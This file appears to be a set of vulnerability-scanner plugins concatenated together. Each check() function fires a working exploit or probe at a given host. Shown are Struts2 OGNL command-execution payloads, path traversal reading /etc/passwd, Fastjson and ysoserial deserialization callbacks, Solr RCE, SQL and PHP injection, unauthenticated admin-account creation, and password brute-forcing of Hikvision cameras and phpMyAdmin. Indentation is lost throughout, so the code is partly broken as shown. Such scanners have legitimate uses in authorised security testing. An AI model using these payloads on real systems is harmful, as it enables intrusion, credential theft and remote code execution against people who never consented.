def check(host, port=5601):
scheme = 'https' if '443' in str(port) else 'http'
target = '{}://{}:{}'.format(scheme, host, port)
uris = [
'/elasticsearch/404adqweqw/_mapping/field/*?_=1569226048367&ignore_unavailable=false&allow_no_indices=false&include_defaults=true',
'/api/saved_objects/_find?type=index-pattern&fields=title&per_page=10'
]
hits = ['"type":"index_not_found_exception","reason', '"saved_objects":[']
try:
targets = ['{}{}'.format(target, uri) for uri in uris]
requests.packages.urllib3.disable_warnings()
with requests.Session() as session:
for target in targets:
response = session.get(target, timeout=7, verify=False)
for hit in hits:
if hit in response.text and response.status_code in [
404, 200
]:
output = response.json()
insert_vuln_db(host, target, output, plugin_id)
return True, host, target, output
except Exception as error:
return False
return False
def check(host, port=80):
scheme = 'https' if '443' in str(port) else 'http'
target = '{}://{}:{}'.format(scheme, host, port)
uris = [
'/doc.pdf', '/help.pdf', '/wendang.pdf', '/api.pdf', '/web.pdf',
'/dev.pdf', '/bangzhu.pdf', '/kaifa.pdf', '/帮助.pdf', '/说明.pdf',
'/手册.pdf'
]
hits = ['application/pdf']
try:
targets = ['{}{}'.format(target, uri) for uri in uris]
requests.packages.urllib3.disable_warnings()
with requests.Session() as session:
for target in targets:
response = session.head(target, timeout=7, verify=False)
for hit in hits:
if hit in str(response.headers.get(
'content-type')) and response.status_code in [200]:
output = response.headers
insert_vuln_db(host, target, output, plugin_id)
return True, host, target, output
except Exception as error:
return False
return False
def check(host, port=80):
scheme = 'https' if '443' in str(port) else 'http'
target = '{}://{}:{}'.format(scheme, host, port)
uris = ['/api/users']
hits = ['', 'username has already been used!']
data = {
"username": "******",
"email": "*****@*****.**",
"realname": "opsbiu",
"password": "******",
"comment": "12",
"has_admin_role": True
}
try:
targets = ['{}{}'.format(target, uri) for uri in uris]
requests.packages.urllib3.disable_warnings()
with requests.Session() as session:
for target in targets:
response = session.post(target,
json=data,
timeout=7,
verify=False)
for hit in hits:
if hit in response.text and response.status_code in [
201, 409
]:
output = data
insert_vuln_db(host, target, output, plugin_id)
return True, host, target, output
except Exception as error:
return False
return False
def check(host, port=80):
scheme = 'https' if '443' in str(port) else 'http'
target = '{}://{}:{}'.format(scheme, host, port)
try:
if not is_hikvision(target):
return False
target = '{}/PSIA/Custom/SelfExt/userCheck'.format(target)
users = ['admin']
passwords = ['12345', '123456', '1234567', '00000']
requests.packages.urllib3.disable_warnings()
with requests.Session() as session:
for password in passwords:
for user in users:
response = session.get(target,
timeout=7,
verify=False,
auth=(user, password))
if '<statusValue>200</statusValue>' in response.text:
output = '用户名:{}\t密码:{}\n{}'.format(
user, password, response.text)
insert_vuln_db(host, target, output, plugin_id)
return True, host, target, output
except:
return False
return False
def check(host, port=80):
scheme = 'https' if '443' in str(port) else 'http'
target = '{}://{}:{}'.format(scheme, host, port)
uris = [
'/index.php?action=login.index&host=0',
'/rockmongo/index.php?action=login.index&host=0'
]
hits = ['root:x:0']
headers = {}
headers[
'Cookie'] = 'ROCK_LANG=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00'
try:
targets = ['{}{}'.format(target, uri) for uri in uris]
requests.packages.urllib3.disable_warnings()
with requests.Session() as session:
for target in targets:
response = session.get(target,
headers=headers,
timeout=7,
verify=False)
for hit in hits:
if hit in response.text:
output = response.text
insert_vuln_db(host, target, output, plugin_id)
return True, host, target, output
except Exception as error:
return False
return False
def check(host, port=80):
scheme = 'https' if '443' in str(port) else 'http'
target = '{}://{}:{}'.format(scheme, host, port)
uris = [
'/?debug=browser&object=(%[email protected]@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=netstat%20-an'
]
hits = [
'Active Connections', 'Active Internet connections', 'ESTABLISHED',
'CLOSE_WAIT', 'TIME_WAIT'
]
try:
targets = ['{}{}'.format(target, uri) for uri in uris]
requests.packages.urllib3.disable_warnings()
with requests.Session() as session:
for target in targets:
response = session.get(target, timeout=10, verify=False)
for hit in hits:
if hit in response.text:
output = response.text
insert_vuln_db(host, target, output, plugin_id)
return True, host, target, output
except Exception as error:
return False
return False
def check(host, port=80):
scheme = 'https' if '443' in str(port) else 'http'
target = '{}://{}:{}'.format(scheme, host, port)
uris = [
'/plugins/servlet/gadgets/makeRequest?url={}://{}:{}@'.format(
scheme, host, port)
]
hits = ['java.lang.IllegalArgumentException: Host name may not be null']
headers = {'X-Atlassian-Token': 'no-check'}
try:
targets = ['{}{}'.format(target, uri) for uri in uris]
requests.packages.urllib3.disable_warnings()
with requests.Session() as session:
for target in targets:
response = session.get(target,
timeout=25,
headers=headers,
verify=False)
for hit in hits:
if hit in response.text:
output = response.text
insert_vuln_db(host, target, output, plugin_id)
return True, host, target, output
except Exception as error:
return False
return False
def check(host, port=443):
scheme = 'https' if '443' in str(port) else 'http'
target = '{}://{}:{}'.format(scheme, host, port)
subdomain, payload_dns = get_dns_payload()
uris = [
'/3.0/authService/config', '/2.0/authService/config',
'/1.0/authService/config'
]
payload = {
"c": {
"@type": "java.net.InetAddress",
"val": payload_dns
},
"b": {}
}
try:
with requests.Session() as session:
requests.packages.urllib3.disable_warnings()
targets = ['{}{}'.format(target, uri) for uri in uris]
for target in targets:
try:
session.post(target, json=payload, timeout=5, verify=False)
except:
pass
finally:
if have_record(subdomain):
insert_vuln_db(host, target, payload_dns, plugin_id)
return True, host, target, payload_dns
return False
except:
return False
def check(host, port=80):
scheme = 'https' if '443' in str(port) else 'http'
target = '{}://{}:{}'.format(scheme, host, port)
uris = ['/index.php?action=login.index']
hits = ['server.createDatabase']
data = "more=0&host=0&username=admin&password=admin&db=&lang=zh_cn&expire=3"
headers = {}
headers['Content-Type'] = 'application/x-www-form-urlencoded'
try:
targets = ['{}{}'.format(target, uri) for uri in uris]
requests.packages.urllib3.disable_warnings()
with requests.Session() as session:
for target in targets:
response = session.post(target,
headers=headers,
data=data,
timeout=7,
verify=False)
for hit in hits:
if hit in response.text:
output = response.text
insert_vuln_db(host, target, output, plugin_id)
return True, host, target, output
except Exception as error:
return False
return False
def check(host, port=6379):
try:
with socket.create_connection((host, port), timeout=5) as conn:
conn.send(b"INFO\r\n")
response = str(conn.recv(2048), 'utf-8', 'ignore')
if 'redis_version' in response:
target = "{}:{}".format(host, port)
insert_vuln_db(host, target, "", plugin_id)
return True, host, target, response
elif "Authentication" in response:
return False
except:
return False
def check(host, port=80):
scheme = 'https' if '443' in str(port) else 'http'
target = '{}://{}:{}'.format(scheme, host, port)
urls = [target, '{}/phpmyadmin/index.php'.format(target)]
try:
for url in urls:
if not is_phpmyadmin(url):
continue
simple_passwords = [
'', '123', '1234', '12345', '123456', '!@#', '1111', '111',
'666', '1314'
]
simple_users = [
'', 'root', 'test', 'admin', 'server', 'password', 'mysql',
'ceshi', 'mima',
host.split('.')[0]
]
passwords = [
'{}{}'.format(user, password) for user in simple_users
for password in simple_passwords
]
for user in ['root', 'test', 'server', 'ceshi']:
for pwd in passwords:
token = get_token(url)
if not token:
return False
data = {
"pma_username": user,
"pma_password": pwd,
"server": 1,
"token": token
}
requests.packages.urllib3.disable_warnings()
response = requests.post(
url,
data,
timeout=7,
headers={'Cookie': "pma_lang=zh_CN"})
if 'login_form' in response.text:
continue
elif response.status_code == 200 and 'db_structure.php' in response.text:
output = "用户名:{}\t 密码:{}".format(user, pwd)
target = url
insert_vuln_db(host, target, output, plugin_id)
return True, host, target, output
except:
return False
return False
def check(host, port=5901):
target = '{}:{}'.format(host, port)
try:
result, vnc = check_anonymous(host, port)
if result:
code, msg = vnc.auth("None")
vnc.disconnect()
if code == 0:
output = '开启匿名访问'
insert_vuln_db(host, target, output, plugin_id)
return True, host, target, output
except:
return False
return False
def check(host, port=80):
scheme = 'https' if '443' in str(port) else 'http'
target = '{}://{}:{}/invoker/readonly'.format(scheme, host, port)
payload_str, payload_dns = new_dns_payload()
payload = Ysoserial().generate(payload='JRMPClient', command=payload_dns)
try:
requests.post(target, data=payload, timeout=10)
except:
pass
results = have_records(payload_str)
if results:
output = payload_str
insert_vuln_db(host, target, output, plugin_id)
return True, host, target, output
return False
def check(host, port=80):
scheme = 'https' if '443' in str(port) else 'http'
target = '{}://{}:{}'.format(scheme, host, port)
url = '{}/index.php/component/users'.format(target)
check_string = random_string(20)
hit = check_string
try:
response = make_req(url, gen_pay('print_r', check_string))
if hit in response:
output = '验证字符串: {}\n请求响应: {}'.format(hit, response)
insert_vuln_db(host, target, output, plugin_id)
return True, host, target, output
except Exception as error:
return False
return False
def check(host, port=80):
scheme = 'https' if '443' in str(port) else 'http'
target = '{}://{}:{}'.format(scheme, host, port)
uris = ['/api/project/swagger_url?url=http://www.baidu.com']
try:
targets = ['{}{}'.format(target, uri) for uri in uris]
requests.packages.urllib3.disable_warnings()
with requests.Session() as session:
for target in targets:
response = session.get(target, timeout=7, verify=False)
if '{"errcode":40011,"errmsg":"请登录...","data":null}' in response.text:
output = response.text
insert_vuln_db(host, target, output, plugin_id)
return True, host, target, output
except Exception as error:
return False
return False
def check(host, port=80):
scheme = 'https' if '443' in str(port) else 'http'
target = '{}://{}:{}'.format(scheme, host, port)
timestamp = int(time.time())
target = '{}/{}.txt'.format(target, timestamp)
try:
file_content = '{}-{}'.format(random.random(), timestamp)
requests.packages.urllib3.disable_warnings()
requests.put(target, json={'data': file_content}, timeout=7)
response = requests.get(target, timeout=7)
if response.text == file_content:
output = '目标开启 http PUT'
insert_vuln_db(host, target, output, plugin_id)
return True, host, target, output
else:
return False
except:
return False
def check(host, port=80):
scheme = 'https' if '443' in str(port) else 'http'
target = '{}://{}:{}'.format(scheme, host, port)
uris = [
"/foo/default/master/..%252F..%252F..%252F..%252F..%252F..%252Fetc%252fpasswd"]
try:
targets = ['{}{}'.format(target, uri) for uri in uris]
requests.packages.urllib3.disable_warnings()
with requests.Session() as session:
for target in targets:
response = session.get(target, timeout=7, verify=False)
if 'root:x:0' in response.text:
output = '/etc/passwd文件内容:\n{}'.format(response.text)
insert_vuln_db(host, target, output, plugin_id)
return True, host, target, output
except Exception as error:
return False
return False
def check(host, port=80):
scheme = 'https' if '443' in str(port) else 'http'
target = '{}://{}:{}'.format(scheme, host, port)
log_files = [
'debug.log', 'web.log', 'app.log', 'init.log', 'test.log',
'install.log', 'api.log', 'access.log', 'user.log', 'deploy.log',
'error.log', 'npm-debug.log'
]
php_paths = ['app/', 'application/', 'log/', '']
uris = [
'/{}{}'.format(php_path, log_file) for php_path in php_paths
for log_file in log_files
]
try:
requests.packages.urllib3.disable_warnings()
targets = ['{}{}'.format(target, uri) for uri in uris]
check_error_response = requests.head(
'{}/loadg/biu404.log'.format(target), timeout=7)
if check_error_response.status_code != 200:
with requests.Session() as session:
for target in targets:
response = session.head(target, timeout=7)
if response.status_code in [
200, 301, 302
] and response.url == target and session.head(
target.replace('.log', '/abc.log'),
timeout=7).status_code not in [200, 301, 302]:
response = session.get(target, timeout=7)
content_type = str(
response.headers.get('Content-Type')) + (
response.headers.get('content-type'))
if response.headers.get(
'Content-Length'
) > 10 and '<div' not in response.text.lower(
) and 'html>' not in response.text and 'json' not in content_type and 'html' not in content_type:
output = response.text
insert_vuln_db(host, target, output, plugin_id)
return True, host, target, output
except:
return False
return False
def check(host, port=80):
scheme = 'https' if '443' in str(port) else 'http'
target = '{}://{}:{}'.format(scheme, host, port)
uris = ['/jolokia/list', '/actuator/jolokia/list']
try:
targets = ['{}{}'.format(target, uri) for uri in uris]
requests.packages.urllib3.disable_warnings()
with requests.Session() as session:
for target in targets:
response = session.head(target, timeout=7)
if response.status_code in [302, 200]:
response = session.get(target, timeout=7)
if 'ch.qos.logback.classic.jmx.JMXConfigurator' in response.text:
output = response.text
insert_vuln_db(host, target, output, plugin_id)
return True, host, target, output
except Exception as error:
return False
return False
def check(host, port=80):
scheme = 'https' if '443' in str(port) else 'http'
target = '{}://{}:{}'.format(scheme, host, port)
uris = ["/composer.lock"]
try:
targets = ['{}{}'.format(target, uri) for uri in uris]
requests.packages.urllib3.disable_warnings()
with requests.Session() as session:
for target in targets:
response = session.get(target, timeout=7)
if 'name' in response.json().get('packages')[0].keys():
check_result = checkLock(response.json())
if len(check_result):
output = check_result
insert_vuln_db(host, target, output, plugin_id)
return True, host, target, output
except Exception as error:
return False
return False
def check(host, port=10250):
scheme = 'https'
target = '{}://{}:{}'.format(scheme, host, port)
uris = ['/runningpods']
hits = ['"kind":"PodList"']
try:
targets = ['{}{}'.format(target, uri) for uri in uris]
requests.packages.urllib3.disable_warnings()
with requests.Session() as session:
for target in targets:
response = session.get(target, timeout=7, verify=False)
for hit in hits:
if hit in response.text and response.status_code in [200]:
output = response.json()
insert_vuln_db(host, target, output, plugin_id)
return True, host, target, output
except Exception as error:
return False
return False
def check(host, port=80):
scheme = 'https' if '443' in str(port) else 'http'
target = '{}://{}:{}'.format(scheme, host, port)
uris = ['/nuxeo/login.jsp/${233*2333}.xhtml']
hits = ['543589']
try:
targets = ['{}{}'.format(target, uri) for uri in uris]
requests.packages.urllib3.disable_warnings()
with requests.Session() as session:
for target in targets:
response = session.get(target, timeout=7, verify=False)
for hit in hits:
if hit in response.text:
output = response.text
insert_vuln_db(host, target, output, plugin_id)
return True, host, target, output
except Exception as error:
return False
return False
def check(host, port=80):
scheme = 'https' if '443' in str(port) else 'http'
target = '{}://{}:{}'.format(scheme, host, port)
hits = ['solr-webapp']
try:
uris = get_cores(host, port)
if len(uris):
targets = ['{}{}'.format(target, uri) for uri in uris]
for target in targets:
config(target)
response = rce(target, 'dir')
for hit in hits:
if hit in response.text:
output = response.text
insert_vuln_db(host, target, target, plugin_id)
return True, host, target, output
except Exception as error:
return False
return False
def check(host, port=80):
scheme = 'https' if '443' in str(port) else 'http'
target = '{}://{}:{}'.format(scheme, host, port)
uris = ['/?a=display&templateFile=README.md']
hits = ['ThinkCMF是一款']
try:
targets = ['{}{}'.format(target, uri) for uri in uris]
requests.packages.urllib3.disable_warnings()
with requests.Session() as session:
for target in targets:
response = session.get(target, timeout=7, verify=False)
for hit in hits:
if hit in response.text and response.status_code in [200]:
output = response.text
insert_vuln_db(host, target, output, plugin_id)
return True, host, target, output
except Exception as error:
return False
return False
def check(host, port=80):
scheme = 'https' if '443' in str(port) else 'http'
target = '{}://{}:{}'.format(scheme, host, port)
uris = ['/WEB-INF/web.xml']
hits = ['</web-app>', '</servlet-mapping>']
try:
targets = ['{}{}'.format(target, uri) for uri in uris]
requests.packages.urllib3.disable_warnings()
with requests.Session() as session:
for target in targets:
response = session.get(target, timeout=7, verify=False)
for hit in hits:
if hit in response.text and response.status_code in [200]:
output = response.text
insert_vuln_db(host, target, output, plugin_id)
return True, host, target, output
except Exception as error:
return False
return False
def check(host, port=80):
scheme = 'https' if '443' in str(port) else 'http'
target = '{}://{}:{}'.format(scheme, host, port)
subdomain, payload_dns = get_dns_payload()
uris = ['/', '/api', '/api/login', '/api/log', '/log']
payload = {"@type": "java.net.InetAddress", "val": payload_dns}
try:
requests.packages.urllib3.disable_warnings()
with requests.Session() as session:
targets = ['{}{}'.format(target, uri) for uri in uris]
for url in targets:
session.post(url, json=payload, timeout=30, verify=False)
if have_record(subdomain):
insert_vuln_db(host, target, payload_dns, plugin_id)
except:
return False
def check(host, port=5984):
scheme = 'https' if '443' in str(port) else 'http'
target = '{}://{}:{}'.format(scheme, host, port)
uris = ['/_session']
hits = ['"roles":["_admin"]}']
try:
targets = ['{}{}'.format(target, uri) for uri in uris]
requests.packages.urllib3.disable_warnings()
with requests.Session() as session:
for target in targets:
response = session.get(target, timeout=7, verify=False)
for hit in hits:
if hit in response.text and response.status_code in [200]:
output = response.json()
insert_vuln_db(host, target, "", plugin_id)
return True, host, target, output
except Exception as error:
return False
return False
def check(host, port=80):
scheme = 'https' if '443' in str(port) else 'http'
target = '{}://{}:{}'.format(scheme, host, port)
hits = ['biuframework']
try:
targets = [target]
headers = {"Content-Type": "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#[email protected]@getResponse().getWriter()).(#o.println('biu'+'framework')).(#o.close())}"}
#requests.packages.urllib3.disable_warnings()
with requests.Session() as session:
for target in targets:
response = session.get(target, timeout=10, verify=False, headers=headers)
for hit in hits:
if hit in response.text:
output = response.text
insert_vuln_db(host, target, output, plugin_id)
return True, host, target, output
except Exception as error:
return False
return False
def check(host, port=80):
scheme = 'https' if '443' in str(port) else 'http'
target = '{}://{}:{}'.format(scheme, host, port)
uris = ['/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20']
hits = ['SQL语句']
try:
targets = ['{}{}'.format(target, uri) for uri in uris]
requests.packages.urllib3.disable_warnings()
with requests.Session() as session:
for target in targets:
response = session.get(target, timeout=7, verify=False)
for hit in hits:
if hit in response.text:
output = response.text
insert_vuln_db(host, target, output, plugin_id)
return True, host, target, output
except Exception as error:
return False
return False
def check(host, port=80):
scheme = 'https' if '443' in str(port) else 'http'
target = '{}://{}:{}'.format(scheme, host, port)
uris = ['/phpmyadmin', '/database', '/pma', '/db', '/mysql', '/console']
hits = ['PMA_commonParams', 'PMA_sendHeaderLocation']
try:
targets = ['{}{}'.format(target, uri) for uri in uris]
requests.packages.urllib3.disable_warnings()
with requests.Session() as session:
for target in targets:
response = session.get(target, timeout=7, verify=False)
for hit in hits:
if hit in response.text:
output = response.text
insert_vuln_db(host, target, output, plugin_id)
return True, host, target, output
except Exception as error:
return False
return False
